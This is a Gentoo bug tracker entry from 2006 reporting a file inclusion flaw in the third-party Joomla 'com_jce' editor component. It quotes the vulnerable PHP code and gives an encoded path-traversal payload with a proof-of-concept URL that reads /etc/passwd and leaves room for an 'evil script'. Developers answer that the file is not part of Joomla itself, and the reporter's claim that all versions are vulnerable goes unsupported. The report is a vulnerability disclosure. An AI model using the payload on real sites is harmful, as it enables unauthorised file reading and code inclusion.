Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 158868 - www-apps/joomla "com_jce" file inclusion
Summary: www-apps/joomla "com_jce" file inclusion
Status: RESOLVED UPSTREAM
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All Linux
: Highest critical (vote)
Assignee: Gentoo Web Application Packages Maintainers
URL:
Whiteboard:
Keywords:
Depends on:
Blocks:
 
Reported: 2006-12-22 15:52 UTC by Emanuele Gentili
Modified: 2006-12-22 18:33 UTC (History)
2 users (show)

See Also:
Package list:
Runtime testing required: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Emanuele Gentili 2006-12-22 15:52:51 UTC
com_jce component in jce.php

...

switch ( $task )
{
    case 'popup':
        showPopup();
    break;
    case 'plugin':

...

look case 'plugin' !!!

$plugin = cleanInput( mosGetParam( $_REQUEST, 'plugin' ) );
            if( in_array( $plugin, $plugins ) ){
                $file = cleanInput( basename( mosGetParam( $_REQUEST, 'file' ) ) );
                $path = $mainframe->getCfg('absolute_path') .
'/mambots/editors/jce/jscripts/tiny_mce/plugins/' . $plugin;                
                if( is_dir( $path ) && file_exists( $path . '/' . $file ) ){
                    include_once $path . '/' . $file;

We can include evil script.

&task=plugin&plugin=..%3C%3E/%3C...%3C///..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////etc&file=passwd&path=


POC:

http://www.website.dom/modules/mod_ajaxtabs_orthopal/index2.php?option=com_jce&task=plugin&plugin=..%3C%3E/%3C...%3C///..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////etc&file=passwd&path=[EVILSCRIPT]




all joomla version is vulnerable, i thnk mambo too. just try :P
Comment 1 Emanuele Gentili 2006-12-22 16:13:03 UTC
upstram (joomla) mailed.
Comment 2 Tavis Ormandy (RETIRED) gentoo-dev 2006-12-22 16:40:56 UTC
Joomla has never been marked stable on any security supported architecture, so the security team wont handle this bug.

It looks like that file is some random third party extension http://extensions.joomla.org/component/option,com_mtree/task,viewlink/link_id,1157/Itemid,35/

There is no jce.php in joomla-1.0.11.tar.bz2, and the string "com_jce" doesnt appear once in the joomla distribution, afaict

Reassigning to web-apps...
Comment 3 Renat Lumpau (RETIRED) gentoo-dev 2006-12-22 18:33:51 UTC
file upstream